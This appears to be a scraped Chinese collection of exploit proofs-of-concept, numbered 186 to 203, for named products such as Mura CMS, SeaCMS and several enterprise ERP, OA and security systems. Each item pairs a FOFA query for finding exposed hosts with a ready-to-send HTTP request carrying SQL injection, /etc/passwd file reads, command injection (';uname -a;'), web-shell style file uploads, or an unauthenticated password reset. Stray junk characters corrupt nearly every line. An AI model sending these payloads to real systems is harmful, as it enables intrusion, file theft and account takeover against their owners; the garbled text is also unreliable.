+ o* L2 q+ z9 [$ [CVE-2024-31750) F- a" g. p! N" r6 E
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统4 w& M$ m1 Z q; K% R% }! T
FOFA:title=="DataCube3"
2 z/ ]" ]9 w c OPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
- g: a1 d3 L: v0 ~Host: your-ip, Z: {7 Q; `$ X* _ @- X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.00 X4 W& ^9 O$ n* y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.80 J- y2 G5 n L3 o4 H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 M1 w; o0 ~5 t
Accept-Encoding: gzip, deflate+ j9 @5 b2 p( h' u" ]1 s
Connection: close4 r: U7 [" {3 ]4 A* `3 p3 v8 W% J
Content-Type: application/x-www-form-urlencoded) p R8 u2 V# o- [
0 w$ y" j6 O" w8 o4 `! ~6 lreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450* J! A. @: I+ G5 W
1 s2 O' L p: k# p0 e& B( }; r. C
6 \- {& a* v. }& f187. Mura CMS processAsyncObject SQL注入. h6 k$ [0 i6 I$ ^0 S3 b& Y9 H
CVE-2024-32640: q ~4 ~* D0 b
FOFA:"Mura CMS"
, |3 {6 i" ^3 VPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
3 a. ~& j, E* G; rHost: your-ip9 o% P4 {0 V6 Y% G; T1 K& [
Content-Type: application/x-www-form-urlencoded& }) x4 V/ J0 z3 x+ r
4 n5 S! k+ S- D: F) Z- o
' P4 S, J0 @) u/ x- J4 Uobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=16 N$ f1 N9 Y! |; p
) k n! ]- z( S U5 ^
' C1 U1 G% O6 C! M+ W+ L188. 叁体-佳会视频会议 attachment 任意文件读取
3 F% K5 N. C+ jversion <= 3.9.7( M; q' P5 A4 X8 q& s9 T5 z
FOFA:body="/system/get_rtc_user_defined_info?site_id"* \" s- E: W0 x' s6 L
GET /attachment?file=/etc/passwd HTTP/1.1* A( k0 z3 E' k8 ]& @+ }5 Z$ o
Host: your-ip" f! {9 m/ B( w2 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
- Q6 I( e/ P: ]$ B$ S! TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 p8 W5 k( L" {3 m, G ]
Accept-Encoding: gzip, deflate
# [ o& y5 y* MAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
# ^* T) [! c. f* {1 Q1 t- PConnection: close) [; O4 C A( M4 S: a2 C5 @
/ q7 l& A ], ?6 d! ~* ]& r' H+ z, D% j& z/ ]4 g
189. 蓝网科技临床浏览系统 deleteStudy SQL注入1 c" B4 P4 R7 A. P
FOFA:app="LANWON-临床浏览系统"* |. [7 D- U' n3 l
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.19 {7 f. j2 k% e
Host: your-ip- A/ }( [$ v9 @% f& e) q
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
+ N; G+ u: e, e ?. R$ L4 ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: }! y) S! P- E$ m& Y$ C1 t
Accept-Encoding: gzip, deflate: _0 x, ?4 e7 M# q
Accept-Language: zh-CN,zh;q=0.9' u) m* z* r$ @, D, t
Connection: close9 ?2 e0 W. W" T/ A5 y, z
) g d7 \" E- C; k
$ H u, c: K0 t+ a0 B" [5 s& i190. 短视频矩阵营销系统 poihuoqu 任意文件读取3 P/ y r! J8 C& z- T
FOFA:title=="短视频矩阵营销系统" t# S2 r9 S! u; _( |8 H+ S- f# ^" J
POST /index.php/admin/Userinfo/poihuoqu HTTP/25 f8 U# }9 k% N& S1 |0 \
Host: your-ip0 d! h: P0 t! E9 e5 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
& R# X4 g( o wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9* k' d* W) P" i. ~& Z0 r/ `
Content-Type: application/x-www-form-urlencoded; `0 s) k2 l8 D
Accept-Encoding: gzip, deflate8 q& x* S0 M @0 q, e; ^9 p7 h
Accept-Language: zh-CN,zh;q=0.9/ T s) Y* {7 Q A
0 A4 J, E* N( w2 L* p
poi=file:///etc/passwd& ?" u4 {' g4 F' I4 {; j" ]# K
" z1 {4 _$ x, z1 v
1 `' t: w/ h* k0 t191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
% U$ i% ^) [; p8 A4 vFOFA:body="/CDGServer3/index.jsp", f; |4 c) K6 C$ V n/ M: o2 d
POST /CDGServer3/js/../NavigationAjax HTTP/1.1; N% W3 h0 Q! Z! S+ n5 O P
Host: your-ip
0 n$ l' j+ q% ~/ Z" |2 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36, H# K7 O, j9 J: Y9 z" K3 X
Content-Type: application/x-www-form-urlencoded' J* m& H: }! K$ y) F5 T
2 K8 s; q: c0 G6 [. g
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
G3 P5 P8 h( I, N' ^/ f g6 ?2 t$ r- V% \8 B! F
3 z) e! o$ e E- C7 ]2 \/ O! \192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
/ k' c$ N( w# Z: B' x2 `( R# h6 m) JFOFA:title="用户登录_富通天下外贸ERP"3 r7 N( U; W: b$ J* ^: J
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
, a a" k) j* u: k9 IHost: your-ip
9 ]: u+ h# E jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
! X3 O+ A) p5 n; x+ f" XContent-Type: application/x-www-form-urlencoded/ u, W! J( N4 U* h* ~1 \3 k
8 S( y( r# U! ?+ ?
. g% O+ J1 L* W1 T3 H- X<% @ webhandler language="C#" class="AverageHandler" %>" j* e0 Y+ J2 t, }: z" N
using System;
( ~7 Y" F/ B, \6 I3 t4 b4 s# lusing System.Web;. W2 I0 e/ i9 t/ p
public class AverageHandler : IHttpHandler
% v* ^ M/ Y! O$ j{
7 _9 b# y& A9 `public bool IsReusable h7 }; H+ n6 t! X
{ get { return true; } }9 }: l |( ?: `6 G* G* Z9 @' M; t
public void ProcessRequest(HttpContext ctx)$ l+ q% Z3 C$ `3 Z4 k6 X6 U: \
{
& E# K. n L7 \8 h1 ^' x) J, Wctx.Response.Write("test");
9 r- [" E) x% [8 z# R/ J* N}8 w' Z6 S! H( Z
}5 S& w" }! C: K/ k3 \! ]
D* j; L6 D( C; p2 C* c* n
; B0 w3 D$ Q3 _
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行0 k, E' D9 ^1 C
FOFA:body="山石云鉴主机安全管理系统"
. p6 z4 F' u t5 { B$ vGET /master/ajaxActions/getTokenAction.php HTTP/1.11 ~& U6 Q8 L& D; i. @9 L
Host:) G) m, [, p0 B- H! Q& d+ K
Cookie: PHPSESSID=2333333333333;* J: ~) _. Q, E8 n- d) c
Content-Type: application/x-www-form-urlencoded
- y7 [& V+ W k9 ?$ I! z' mUser-Agent: Mozilla/5.0- u( N9 {1 I+ r% b
, U# Q, R. D) s5 }
+ ?) O9 n2 P7 L8 m0 j
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1" t9 y' v) @7 s, U7 m$ T0 `/ S: i2 A6 t
Host:
! {/ a+ C$ V+ i7 v' @User-Agent: Mozilla/5.0& S% P o8 e3 h4 S( v
Accept-Encoding: gzip, deflate
. b. p/ X7 Q% x+ eAccept: */*
4 `, w5 u) e5 R3 }7 VConnection: close
1 ~# Q$ [7 d% H) I4 ^" PCookie: PHPSESSID=2333333333333;
$ [; V* |* p8 ^9 o" J) t/ j1 BContent-Type: application/x-www-form-urlencoded% T% P9 Y! |4 @( y" N+ K9 m9 F1 p
Content-Length: 84
6 I7 ~2 a7 `" w D3 m2 n# r, o+ {' b& P: Y& m Y/ J
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')- G e8 |6 ?" T3 |6 f! D
' Z- u+ ?1 B' k3 P1 S
5 V. p+ J7 N5 ]4 @( D6 g) _
GET /master/img/config HTTP/1.1: ]. S9 q+ R- t, V
Host:( ]- |% t5 i! K
User-Agent: Mozilla/5.0, E2 D& v _# n# K
3 m7 ?2 w8 e! M# e ?: i) h9 H/ i+ r) }
5 |0 c( x+ n) Q7 \* u9 ~0 c" `194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传. X* i5 d6 a0 A7 Z
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
, q% e$ y4 r7 k* L8 r
$ h% z8 |% [9 e" M6 VPOST /servlet/uploadAttachmentServlet HTTP/1.15 ^1 Q8 Q. p7 J: Y: g! a2 L
Host: host, z, i9 L2 {& E9 g, z4 g% a" E% B* i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
- K4 ~* ^; M3 w) ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& k' t1 X4 Y: [* j7 X% O7 r5 dAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; j$ O' k! P) `1 [
Accept-Encoding: gzip, deflate
! l% R# S ~- JConnection: close6 K, @- l! m8 P3 S
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk* `+ M* m& G# |4 g! S) J
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
]! z( P( z" w8 A' F/ K2 a6 c2 Q9 g1 |, x: H2 K
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp", {9 k; O2 Z8 Y/ u
Content-Type: text/plain9 Z, |3 F, V) v7 R. |# B' w
<% out.println("hello");%>
: K5 V+ G6 V) P) \* Q; O7 e. s------WebKitFormBoundaryKNt0t4vBe8cX9rZk
- I# ?- W' c9 u# }. m8 MContent-Disposition: form-data; name="json"# q J9 Y% r7 r ]8 T# D Z$ a
{"iq":{"query":{"UpdateType":"mail"}}}
) g& q4 t$ d2 ?2 n" e9 U3 E------WebKitFormBoundaryKNt0t4vBe8cX9rZk-- @/ ]$ L) J( p0 `( m8 C+ ^* C% E
( A& K: f6 Q6 W9 V: w6 [/ P. E/ T9 j# H$ }* o- q* w
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行$ U1 R4 U8 u+ S1 ]9 f% r2 m; o5 M
FOFA:title=="飞鱼星企业级智能上网行为管理系统
4 n0 I# ^3 T7 u4 UPOST /send_order.cgi?parameter=operation HTTP/1.1
8 E; J1 [' A+ j+ j, T' NHost: 127.0.0.1
& J2 p$ U+ D3 zPragma: no-cache
- @5 I7 e+ G; p2 l. iCache-Control: no-cache6 g. y5 E; O! E! D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
5 K) i! f, r* W& B$ xAccept: */*
4 _* U( P9 x( e) M1 \, s: @Accept-Encoding: gzip, deflate; y* o' K* r. F2 d+ O( O
Accept-Language: zh-CN,zh;q=0.9
5 `' t m4 R, b) L0 D& FConnection: close
3 \1 k) V! j- @$ H: A, ^Content-Type: application/x-www-form-urlencoded
% W& S5 |# Y0 j0 sContent-Length: 68
. ?7 t7 Q8 s- Y# ?+ P$ K6 e$ n' T1 ]8 @ y$ q3 `
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
& Z! J8 Q* I; R! c9 E. o8 i+ |& q1 k
3 _' d: U8 a7 d# W7 _
196. 河南省风速科技统一认证平台密码重置
1 S: f. M- Y) G+ a' IFOFA:body="/cas/themes/zbvc/js/jquery.min.js"9 Y- K( y* h- Z7 L0 l# m
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1 O5 z# e& n# L" U* n O( @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36' C& j: l3 C5 d; F1 Y0 y% y9 L
Content-Type: application/json;charset=UTF-8- ?4 e& S* t$ o# y" V+ n2 z
X-Requested-With: XMLHttpRequest
8 W4 b0 j- U% P& v7 PHost:" H. @/ r$ ~: `7 A; c2 Q
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.22 b; E; e8 j" b1 c% G; b1 c" S
Content-Length: 45
: h7 k' E8 M. s" O7 A, s+ ~& A8 V3 WConnection: close6 I% O' J$ r: g7 S0 R- v( c- v8 V
2 h8 T: f5 s, x# d{"xgh":"test","newPass":"test666","email":""}
( b, M' i( J: V
; K! D" P1 [ x% i( h8 L- @0 g" r
$ ^, W3 q$ K! c, n1 G/ y6 Q& x
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
8 }+ W$ d1 v @0 q m# O, KFOFA:app="浙大恩特客户资源管理系统"
, h" _% R ?3 u7 AGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
9 r' ~% ?; o5 I3 B; C3 ?Host:
" \. W i e1 `% |User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36: l+ p& c# e$ F$ J
Accept-Encoding: gzip, deflate* S; k2 I9 r. y$ v& _' E& l
Connection: close
: t3 D& g3 a/ @4 b9 V9 S$ z: Z1 e: N g1 z2 N* f4 L% [- |" |% _
' I8 O& x! M: w2 P" l& O
/ o$ O) w8 K% D5 y1 J
198. 阿里云盘 WebDAV 命令注入
5 u2 j7 B7 k2 M& T, |. gCVE-2024-29640; Z) y* @1 V) v) u- z a1 I
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.14 u3 y5 t7 e) k5 F( Q2 K: d
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
4 w) n9 N# X) t) q7 b! _7 f4 HAccept: */*
: h* R+ ~2 R& m' G! VAccept-Encoding: gzip, deflate
% g2 |; m/ p5 R Q8 UAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.66 r6 Z/ G9 I0 q& B/ E
Connection: close
: e: y; Y+ |8 q* }$ ?3 d* s' V$ g0 h/ T; U0 r5 M+ O
/ x& h5 d \% L. A# T
199. cockpit系统assetsmanager_upload接口 文件上传* x% F1 x9 v) G3 R& m0 U4 X
8 @% c; k7 r- x, c8 a! n$ r, @7 N$ ?* }
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:9 X8 a& b( Y# O! w( p8 q' _9 l
GET /auth/login?to=/ HTTP/1.1; k5 }* d- Z$ a8 ?/ U& X( D
n9 T) [2 A ]# e* F响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"/ B" G: p. c) o1 r$ @! B0 A# y
8 c7 s" I! j0 r9 }5 E
2.使用刚才上一步获取到的jwt获取cookie:
0 J' {4 B0 H0 V$ G$ [5 w# M
4 }6 i. v$ }# p* `) ]5 pPOST /auth/check HTTP/1.1
1 O1 Z4 Z, L* q" SContent-Type: application/json3 c, G- D' W/ @; i& f6 U
1 Z* `8 G, i8 x7 \
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
+ n! h" H I+ ~3 R1 C) O1 S, [, D5 U5 W- ]
响应:200,返回值:
/ a* p& x2 i8 G; dSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
2 l$ a1 p. u5 BFofa:title="Authenticate Please!"
, G1 U/ p* X' _POST /assetsmanager/upload HTTP/1.1
8 ~6 V/ U/ N, T& c4 N6 pContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
, H' `+ X: n$ A7 TCookie: mysession=95524f01e238bf51bb60d77ede3bea92, E3 m9 m$ n- V0 s$ ?- g6 X* ]
$ `/ U/ j I+ p* t
-----------------------------36D28FBc36bd6feE7Fb3
; m/ u2 ?: O5 u6 l0 ]Content-Disposition: form-data; name="files[]"; filename="tttt.php"
" A/ |6 z9 p( ?5 o2 EContent-Type: text/php: L) Q% D4 }' G& H; F( r- e
9 T: W, t% j! U<?php echo "tttt";unlink(__FILE__);?>
e( S9 q; p, ?6 ?-----------------------------36D28FBc36bd6feE7Fb3
# j2 K6 n2 J3 L- dContent-Disposition: form-data; name="folder"' u! M% U' m, r
" s) r5 l; O5 x5 i% \-----------------------------36D28FBc36bd6feE7Fb3--! U/ C7 S7 u% D3 M
) U. T) | Q% z. f
' W4 d% E9 \# v8 K/storage/uploads/tttt.php
+ Z' H( G0 ~0 `! L$ @4 U5 m
0 `( @: L0 S8 V# h4 ~200. SeaCMS海洋影视管理系统dmku SQL注入
& S8 s) M- r5 \- }% RFOFA:app="海洋CMS"
0 @: H* s! k6 X5 t1 U, QGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.17 x, {% ]+ d' i2 m
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
3 f& Y0 R4 B4 @/ ? tUpgrade-Insecure-Requests: 1& R7 a6 Y( c ]* W/ _/ M$ e2 @
Cache-Control: max-age=0
% w2 n5 D M7 fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# L8 H j) F7 h; p% B( g
Accept-Encoding: gzip, deflate: g7 `; c9 j Z F9 U. A( n/ @
Accept-Language: zh-CN,zh;q=0.9! M% T) N$ X* t8 P3 g7 w1 `
1 @# P0 V, f8 t9 S: F
) @6 }$ L! t# `0 S; I, e- }201. 方正全媒体新闻采编系统 binary SQL注入
+ a3 H$ Q. M$ L0 i0 @FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"- z0 s7 t: u( j7 B* @
POST /newsedit/newsplan/task/binary.do HTTP/1.1# I+ a7 f: J! E9 g% W
Content-Type: application/x-www-form-urlencoded$ T6 k% ]* y' W. a6 p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 Q* I& b4 v# b1 y# PAccept-Encoding: gzip, deflate: R4 @$ \0 @4 P6 t1 O+ t
Accept-Language: zh-CN,zh;q=0.9 a9 @* R5 V3 @
Connection: close
4 ~; J5 ?8 m9 h+ l3 v0 e, H( H& r- b" `3 z* l% d
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
7 c/ C$ D8 E# x( f! Z# e
2 Z/ u* O+ N( g- s+ F9 c, j& r, E; F& f7 ?' z1 F8 ]
202. 微擎系统 AccountEdit任意文件上传
' \: Y! L9 `* w: M* G8 `' s) C R& e" hFOFA:body="/Widgets/WidgetCollection/"# n7 Y y7 G( S6 O
获取__VIEWSTATE和__EVENTVALIDATION值) d, i1 A# e y; R9 j A; r
GET /User/AccountEdit.aspx HTTP/1.15 K$ J3 K' F" r+ q/ f: O0 R
Host: 滑板人之家& V6 l& x8 K0 i; I" ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
) t3 n9 a: O- N& ~8 ^$ m, J4 dContent-Length: 0- o$ [% S/ T8 c) x: a9 _
1 p. I/ ~# q, n/ e8 n7 H9 O
, h3 N% p, h" s, d替换__VIEWSTATE和__EVENTVALIDATION值
% D8 ~- n7 c, v9 H. OPOST /User/AccountEdit.aspx HTTP/1.1
" i3 C0 }0 W8 [Accept-Encoding: gzip, deflate, br
7 C" E( v% w; a4 BContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687, ~, B! k1 S; ~: \0 ~8 X) _
7 ^. g! s' q% V-----------------------------786435874t38587593865736587346567358735687 t: v7 T- i y% ~8 A, }6 S
Content-Disposition: form-data; name="__VIEWSTATE"
! X% O3 f! \0 m# O. U0 K& m$ q9 m6 g/ L# \3 j, A+ U, z$ K
__VIEWSTATE) L! i, _8 s' ~# P( b/ ?" A
-----------------------------786435874t38587593865736587346567358735687
% z. d+ G' |: i$ UContent-Disposition: form-data; name="__EVENTVALIDATION"
) g/ K3 o, S+ u* M8 J! D$ G# E% y2 y7 u$ d A# N0 T. a& M7 {! S
__EVENTVALIDATION& C) W8 q0 t1 w: r
-----------------------------786435874t38587593865736587346567358735687
+ A# [' X) z. f* o, MContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"+ `+ ^5 o9 J* j9 B# H, r, W
Content-Type: text/plain3 D8 R! Q: _2 R+ ~" x
( R1 U1 r4 _& L; ?& b8 dHello World!
* l' r$ x+ g: A2 u; e-----------------------------786435874t385875938657365873465673587356873 |0 g( j9 _& k+ ]% @
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"' r) n' c* i! j' Q3 m3 [4 L- w
0 e! a+ R7 _3 t5 `& z+ E上传图片
- {; U/ V: c' [! e7 b-----------------------------786435874t38587593865736587346567358735687
; V/ |8 R& e6 b: b8 w7 }Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
6 ], O) S" l8 w0 T2 W" Z2 o. O
. j. E8 ^' \" b% @( u9 C! x" }" x' m6 E
-----------------------------786435874t38587593865736587346567358735687; f) H4 J% o9 |* r) j- _" z
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"0 L+ m) E _) Y8 S% Y
: J0 @& }3 A$ Z1 K. Q: ~! [- h9 }) K1 X4 a
-----------------------------786435874t38587593865736587346567358735687--
{, _% e6 a/ D6 n" Z' R2 z7 y! T6 F2 y$ Y K1 U! s4 a
' d" |) S% e" J' a h5 Y/_data/Uploads/1123.txt" x) D# ]4 y+ O6 o- F1 B }+ s ^
4 V. i7 e x$ g+ N. n: k203. 红海云EHR PtFjk 文件上传
2 @6 w$ _3 F+ y) M' `9 ~FOFA:body="RedseaPlatform"* k" T# M! b0 j
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
# D0 O5 n4 c8 l$ f4 n, `9 \Host: x.x.x.x
- ^% V* b N# V3 \4 bAccept-Encoding: gzip2 y% o; ^7 G' {+ X, |4 g9 b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 \! s6 u3 `( O. @! y$ h" K/ ZContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
/ m% t8 z7 ^, H6 ~' i1 OContent-Length: 210. o/ p% u" ?5 X; G3 P
% ?- f7 ]& @1 O; b# S- D$ l# }
------WebKitFormBoundaryt7WbDl1tXogoZys4
; O& H5 G/ r) G# z F* UContent-Disposition: form-data; name="fj_file"; filename="11.jsp"
+ y) z" z& G7 A* {Content-Type:image/jpeg4 H+ x0 a6 Y& Z* ^+ } N+ W* _
# `2 J3 @" n( Z, v# Y<% out.print("hello,eHR");%>8 [. Z J+ V3 I4 Q+ L7 D, m
------WebKitFormBoundaryt7WbDl1tXogoZys4--# @4 e1 h$ f* z; U
" b' R7 `, J( U) g! \7 a / ^6 M9 K1 F: _/ P ?
- L$ }1 w! S7 x+ ~# n2 b
) K- v- I$ q' X6 ~
6 {- H3 k, f8 j$ ^/ _" r
; f- `3 F& Q0 n2 T4 S Z |